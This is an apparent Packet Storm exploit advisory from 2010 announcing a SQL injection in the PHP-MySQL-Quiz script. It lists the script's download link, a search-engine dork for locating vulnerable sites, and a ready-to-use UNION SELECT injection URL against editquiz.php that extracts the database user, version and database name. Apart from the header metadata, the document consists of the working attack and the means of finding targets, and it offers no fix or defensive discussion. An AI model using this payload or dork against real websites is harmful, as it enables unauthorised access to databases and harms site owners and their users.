PHP-MySQL-Quiz SQL Injection

2010-01-01T00:00:00
ID PACKETSTORM:84594
Type packetstorm
Reporter Hussin X
Modified 2010-01-01T00:00:00

Description

                                        
                                            `# PHP-MySQL-Quiz SQL Injection Vulnerability  
  
#  
# Author: Hussin X  
  
# Home : www.iq-ty.com<http://www.iq-ty.com>  
  
# email: darkangel_g85[at]Yahoo[DoT]com  
  
  
##########################################################  
# HomE script : http://www.widgetmonkey.com/  
  
# Download : http://www.getfreesofts.com/script_download.php?id=18744&id_1=881  
  
# DorK : inurl:quizinfo.php  
  
  
  
Exploit:  
  
http://www.site.com/Script/editquiz.php?id=-1+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8--  
  
  
IQ-SecuritY FoRuM  
`